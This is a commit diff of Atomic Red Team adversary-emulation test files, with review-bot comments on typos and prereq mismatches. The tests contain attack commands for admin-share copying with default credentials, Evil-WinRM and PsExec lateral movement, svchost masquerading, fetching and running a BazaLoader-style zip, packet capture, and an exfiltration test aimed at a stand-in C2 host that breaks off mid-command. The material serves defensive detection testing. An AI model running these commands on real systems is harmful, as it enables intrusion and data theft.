reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1
netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
+11 -13
@@ -10,19 +10,19 @@ atomic_tests:
input_arguments:
user_name:
description: Username
type: String
type: string
default: DOMAIN\Administrator
share_name:
description: Examples C$, IPC$, Admin$
type: String
type: string
default: C$
password:
description: Password
type: String
type: string
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
type: string
default: Target
executor:
command: |
@@ -37,15 +37,15 @@ atomic_tests:
input_arguments:
share_name:
description: Examples C$, IPC$, Admin$
type: String
type: string
default: C$
map_name:
description: Mapped Drive Letter
type: String
type: string
default: g
computer_name:
description: Target Computer Name
type: String
type: string
default: Target
executor:
command: |
@@ -60,11 +60,11 @@ atomic_tests:
input_arguments:
command_path:
description: File to copy and execute
type: Path
type: path
default: C:\Windows\System32\cmd.exe
remote_host:
description: Remote computer to receive the copy and execute the file
type: String
type: string
default: '\\localhost'
psexec_exe:
description: Path to PsExec
@@ -96,16 +96,14 @@ atomic_tests:
input_arguments:
output_file:
description: Remote computer to receive the copy and execute the file
type: String
type: string
default: output.txt
command_to_execute:
description: Command to execute for output.
type: String
type: string
default: hostname
executor:
command: |
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
name: command_prompt
elevation_required: true
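Review bot: the `output_file` description in this hunk ("Remote computer to receive the copy and execute the file") is copied from the `remote_host` argument earlier in this file and does not describe the argument. Given the default `output.txt` and its use in `1> \\127.0.0.1\ADMIN$\#{output_file}`, something like "File name under the ADMIN$ share that receives the command output" fits, and since the value is a file name, `type: path` may be more accurate than `string` given the `Path`→`path` convention this commit applies elsewhere.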
+1 -1
@@ -16,7 +16,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Name of Computer
type: String
type: string
default: localhost
executor:
command: |
+4 -4
@@ -28,7 +28,7 @@ atomic_tests:
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
cleanup_command: Disable-PSRemoting -Force
name: powershell
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
@@ -37,15 +37,15 @@ atomic_tests:
input_arguments:
user_name:
description: Username
type: String
type: string
default: Domain\Administrator
destination_address:
description: Remote Host IP or Hostname
type: String
type: string
default: Target
password:
description: Password
type: String
type: string
default: P@ssw0rd1
dependency_executor_name: powershell
dependencies:
+1 -2
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
file_to_pad:
description: Path of binary to be padded
type: Path
type: path
default: /tmp/evil-binary
dependency_executor_name: bash
dependencies:
@@ -29,4 +29,3 @@ atomic_tests:
cleanup_command: |
rm #{file_to_pad}
name: sh
+4 -5
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx
executor:
command: |
@@ -31,7 +31,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed
executor:
command: |
@@ -49,7 +49,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx
executor:
command: |
@@ -69,7 +69,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed
executor:
command: |
@@ -77,4 +77,3 @@ atomic_tests:
cleanup_command: |
rm /tmp/packed_bin
name: sh
+6 -7
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
output_file:
description: Output compiled binary
type: Path
type: path
default: C:\Windows\Temp\T1027.004.exe
input_file:
description: C# code that launches calc.exe from a hidden cmd.exe Window
type: Path
type: path
default: PathToAtomicsFolder\T1027.004\src\calc.cs
dependency_executor_name: powershell
dependencies:
@@ -44,7 +44,7 @@ atomic_tests:
input_arguments:
input_file:
description: exe program containing dynamically compiled C# code
type: Path
type: path
default: PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe
dependency_executor_name: powershell
dependencies:
@@ -69,7 +69,7 @@ atomic_tests:
input_arguments:
input_file:
description: source file
type: Path
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.c
dependency_executor_name: sh
dependencies:
@@ -94,7 +94,7 @@ atomic_tests:
input_arguments:
input_file:
description: source file
type: Path
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc
dependency_executor_name: sh
dependencies:
@@ -119,7 +119,7 @@ atomic_tests:
input_arguments:
input_file:
description: source file
type: Path
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.go
dependency_executor_name: sh
dependencies:
@@ -133,4 +133,3 @@ atomic_tests:
command: |
go run #{input_file}
name: bash
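Review bot: the executor for the Go test at the end of this hunk is `name: bash`, while its `dependency_executor_name` a few lines above (and the C and C++ tests earlier in this file) use `sh`. Unless `go run #{input_file}` needs a bash-only feature, `name: sh` keeps the two executors consistent and avoids requiring bash on minimal hosts.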
+14 -14
@@ -14,7 +14,7 @@ atomic_tests:
input_arguments:
shell_command:
description: command to encode
type: String
type: string
default: "echo Hello from the Atomic Red Team && uname -v"
dependency_executor_name: sh
dependencies:
@@ -44,7 +44,7 @@ atomic_tests:
input_arguments:
powershell_command:
description: PowerShell command to encode
type: String
type: string
default: Write-Host "Hey, Atomic!"
executor:
command: |
@@ -65,15 +65,15 @@ atomic_tests:
input_arguments:
registry_key_storage:
description: Windows Registry Key to store code
type: String
type: string
default: HKCU:Software\Microsoft\Windows\CurrentVersion
powershell_command:
description: PowerShell command to encode
type: String
type: string
default: Write-Host "Hey, Atomic!"
registry_entry_storage:
description: Windows Registry entry to store code under key
type: String
type: string
default: Debug
executor:
command: |
@@ -96,7 +96,7 @@ atomic_tests:
input_arguments:
url_path:
description: url to download Exe
type: Url
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip
dependency_executor_name: powershell
dependencies:
@@ -126,19 +126,19 @@ atomic_tests:
input_arguments:
input_file:
description: Path of the XLSM file
type: Path
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
sender:
description: sender email
type: String
type: string
default: test@corp.com
receiver:
description: receiver email
type: String
type: string
default: test@corp.com
smtp_server:
description: SMTP Server IP Address
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -154,11 +154,11 @@ atomic_tests:
input_arguments:
input_file:
description: Path of the XLSM file
type: Path
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
ip_address:
description: Destination IP address
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -185,11 +185,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to download
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path/filename to save the dowloaded file to
type: Path
type: path
default: Atomic-license.txt
executor:
steps: |
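Review bot: typo in the `local_path` description in this hunk: "dowloaded" should be "downloaded". Since this commit already touches the adjacent line for the `Path`→`path` change, fixing the spelling here avoids a separate one-character diff later.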
+2 -3
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
file_name:
description: File name
type: Path
type: path
default: T1030_urandom
folder_path:
description: Path where the test creates artifacts
type: Path
type: path
default: /tmp/T1030
dependency_executor_name: sh
dependencies:
@@ -31,4 +31,3 @@ atomic_tests:
cleanup_command: |
if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
name: sh
+1 -1
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Name of remote computer
type: String
type: string
default: localhost
executor:
command: |
+21 -22
@@ -87,11 +87,11 @@ atomic_tests:
input_arguments:
outputfile:
description: path of file to execute
type: Path
type: path
default: ($env:TEMP + "\svchost.exe")
inputfile:
description: path of file to copy
type: Path
type: path
default: PathToAtomicsFolder\T1036.003\bin\T1036.003.exe
dependency_executor_name: powershell
dependencies:
@@ -119,11 +119,11 @@ atomic_tests:
input_arguments:
outputfile:
description: path of file to execute
type: Path
type: path
default: ($env:TEMP + "\svchost.exe")
inputfile:
description: path of file to copy
type: Path
type: path
default: $env:ComSpec
executor:
command: |
@@ -162,32 +162,32 @@ atomic_tests:
input_arguments:
exe_path:
description: path to exe to use when creating masquerading files
type: Path
type: path
default: C:\Windows\System32\calc.exe
vbs_path:
description: path of vbs to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs
ps1_path:
description: path of powershell script to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1
dependency_executor_name: powershell
dependencies:
- description: |
File to copy must exist on disk at specified location (#{vbs_path})
prereq_command: |
if (Test-Path #{vbs_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
- description: |
File to copy must exist on disk at specified location (#{ps1_path})
prereq_command: |
if (Test-Path #{ps1_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
- description: |
File to copy must exist on disk at specified location (#{vbs_path})
prereq_command: |
if (Test-Path #{vbs_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
- description: |
File to copy must exist on disk at specified location (#{ps1_path})
prereq_command: |
if (Test-Path #{ps1_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
executor:
command: |
copy #{exe_path} %temp%\T1036.003_masquerading.docx.exe /Y
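Review bot: the re-indented `dependencies` entries in this hunk still pass `#{vbs_path}` and `#{ps1_path}` unquoted to `Test-Path` and `split-path`, while the `-OutFile "#{vbs_path}"` and `-OutFile "#{ps1_path}"` on the following lines are quoted. If `PathToAtomicsFolder` resolves to a directory containing a space, the prereq check and directory creation fail while the download would have worked. Quote them consistently, e.g. `if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}` and `New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null`.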
@@ -219,4 +219,3 @@ atomic_tests:
del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
name: command_prompt
+5 -5
@@ -6,12 +6,12 @@ atomic_tests:
description: |
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
test_message:
description: Test message to echo out to the screen
type: String
type: string
default: Hello from the Atomic Red Team test T1036.005#1
executor:
name: sh
@@ -32,7 +32,7 @@ atomic_tests:
input_arguments:
executable_filepath:
description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
type: String
type: string
default: $Env:windir\Temp\svchost.exe
executor:
command: |
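Review bot: `executable_filepath` in this hunk is described as a file path and defaults to `$Env:windir\Temp\svchost.exe`, so `type: path` (the value this commit uses for the other path arguments) fits better than `type: string`.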
@@ -43,7 +43,7 @@ atomic_tests:
}
}
'@ -OutputAssembly "#{executable_filepath}"
Start-Process -FilePath "#{executable_filepath}"
cleanup_command: |
Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+41 -41
@@ -1,41 +1,41 @@
attack_technique: T1036
display_name: "Masquerading"
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
executor:
command: |-
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5
stop-process -name "cmd" | out-null
cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
name: powershell
- name: Malware Masquerading and Execution from Zip File
auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: Url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
attack_technique: T1036
display_name: "Masquerading"
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
executor:
command: |-
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5
stop-process -name "cmd" | out-null
cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
name: powershell
- name: Malware Masquerading and Execution from Zip File
auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
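Review bot: the only content change in this whole-file hunk is `type: Url` → `type: url` on the `url` argument; every other line shows as removed and re-added with identical text, which points to a line-ending or indentation change, so confirm with `git diff -w` that nothing else moved. Separately, `cleanup_command` removes the extracted `$env:userprofile\Downloads\T1036` folder but not the `$env:userprofile\Downloads\T1036.zip` fetched by `get_prereq_command`, so the archive stays on disk after the test.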
+3 -3
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
script_path:
description: Path to .bat file
type: String
type: string
default: '%temp%\art.bat'
script_command:
description: Command To Execute
type: String
type: string
default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt
executor:
command: |
@@ -25,4 +25,4 @@ atomic_tests:
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
del #{script_path} >nul 2>&1
del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
name: command_prompt
name: command_prompt
+32 -32
@@ -1,5 +1,5 @@
attack_technique: T1039
display_name: Data from Network Shared Drive
display_name: Data from Network Shared Drive
atomic_tests:
- name: Copy a sensitive File over Administive share with copy
auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
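Review bot: typo in the test name shown as context in this hunk: "Copy a sensitive File over Administive share with copy" should read "Administrative share". The `display_name` line changed here only drops trailing whitespace, so the adjacent name line is worth correcting in the same pass.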
@@ -10,31 +10,31 @@ atomic_tests:
- windows
input_arguments:
remote:
description: Remote server name
description: Remote server name
type: string
default: '127.0.0.1'
share_file:
description: Remote Path to the file
type: Path
type: path
default: Windows\temp\Easter_Bunny.password
local_file:
description: Local name
type: string
default: 'Easter_egg.password'
default: 'Easter_egg.password'
dependency_executor_name: powershell
dependencies:
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
executor:
command: |-
copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
@@ -52,31 +52,31 @@ atomic_tests:
- windows
input_arguments:
remote:
description: Remote server name
description: Remote server name
type: string
default: '127.0.0.1'
share_file:
description: Remote Path to the file
type: Path
type: path
default: Windows\temp\Easter_Bunny.password
local_file:
description: Local name
type: string
default: 'Easter_egg.password'
default: 'Easter_egg.password'
dependency_executor_name: powershell
dependencies:
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
executor:
command: |-
copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"
@@ -84,4 +84,4 @@ atomic_tests:
Remove-Item -Path "\\#{remote}\C$\#{share_file}"
Remove-Item -Path "$Env:TEMP\#{local_file}"
name: powershell
elevation_required: true
elevation_required: true
+84 -86
@@ -12,16 +12,16 @@ atomic_tests:
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: String
type: string
default: ens33
dependency_executor_name: bash
dependencies:
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
executor:
command: |
tcpdump -c 5 -nnni #{interface}
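Review bot: the dependency in this hunk passes when either `tcpdump` or `tshark` is present, but the executor only runs `tcpdump -c 5 -nnni #{interface}`, so on a host with only tshark the prereq is satisfied and the test fails. Either check for `tcpdump` alone in `prereq_command` or have the executor fall back to tshark when tcpdump is absent.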
@@ -39,16 +39,16 @@ atomic_tests:
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: String
type: string
default: en0A
dependency_executor_name: bash
dependencies:
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
executor:
command: |
sudo tcpdump -c 5 -nnni #{interface}
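Review bot: this is the macOS variant (`sudo tcpdump`, interface `en0A`), yet `get_prereq_command` only tries `yum` and `apt-get`, neither of which exists on macOS, so the dependency can never be auto-installed there; a Homebrew branch or a `Write-Host`-style "install manually" message would be more honest. The same prereq/executor mismatch as the Linux test above applies: tshark satisfies the check but the executor only calls tcpdump.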
@@ -67,40 +67,38 @@ atomic_tests:
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: String
type: string
default: Ethernet
wireshark_url:
description: wireshark installer download URL
type: Url
type: url
default: https://1.eu.dl.wireshark.org/win64/Wireshark-win64-latest.exe
tshark_path:
description: path to tshark.exe
type: Path
description: path to tshark.exe
type: path
default: c:\program files\wireshark\tshark.exe
npcap_url:
description: npcap installed download URL
type: Url
type: url
default: https://nmap.org/npcap/dist/npcap-1.31.exe
npcap_path:
description: path to npcap.sys
type: Path
type: path
default: C:\Program Files\Npcap\npcap.sys
dependency_executor_name: powershell
dependencies:
- description: |
tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
prereq_command:
if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: |
npcap must be installed.
prereq_command:
if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
Start-Process $env:temp\npcap_installer.exe
- description: |
tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: |
npcap must be installed.
prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
Start-Process $env:temp\npcap_installer.exe
executor:
command: |
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
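Review bot: the executor in this hunk hardcodes `"c:\Program Files\Wireshark\tshark.exe"` instead of using the `tshark_path` argument defined just above it (default `c:\program files\wireshark\tshark.exe`), so overriding `tshark_path` changes the prereq check but not the command that runs; use `"#{tshark_path}" -i #{interface} -c 5`. Two smaller points: the npcap installer is started with `Start-Process $env:temp\npcap_installer.exe` and no silent switch while the Wireshark installer gets `/S`, so `get_prereq_command` will block on an interactive installer; and the `npcap_url` description reads "npcap installed download URL" where "installer" is meant.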
@@ -138,8 +136,8 @@ atomic_tests:
cleanup_command: |-
del %TEMP%\t1040.etl
name: command_prompt
elevation_required: true
elevation_required: true
- name: Windows Internal pktmon set filter
auto_generated_guid: 855fb8b4-b8ab-4785-ae77-09f5df7bff55
description: |-
@@ -163,24 +161,24 @@ atomic_tests:
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: String
type: string
default: en0
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_macos_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -i #{ifname} -t 3
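Review bot: `prereq_command` for this macOS test is a bare `exit 1`, so the dependency is reported unmet on every run and `cc #{csource_path} -o #{program_path}` recompiles each time even when the binary already exists; the Linux tests further down in this file use `if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi`, which fits here as well. `csource_path` and `program_path` are file paths and could be `type: path` like the other path arguments updated in this commit.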
@@ -197,24 +195,24 @@ atomic_tests:
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: String
type: string
default: en0
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_macos_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -f -i #{ifname} -t 3
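Review bot: same issue as the previous macOS test: `prereq_command` is a bare `exit 1`, so `cc` runs on every execution; reuse the `if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi` check from the Linux tests below.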
@@ -231,20 +229,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -a -t 3
@@ -261,20 +259,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -4 -p 6 -t 3
@@ -292,20 +290,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -4 -P -p 17 -t 3
@@ -323,20 +321,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -a -f -t 3
+8 -8
@@ -10,18 +10,18 @@ atomic_tests:
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: String
type: string
default: example.com
filepath:
description: The file which is being exfiltrated to the C2 Server.
type: Path
type: path
default: $env:TEMP\LineNumbers.txt
executor:
command: |
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
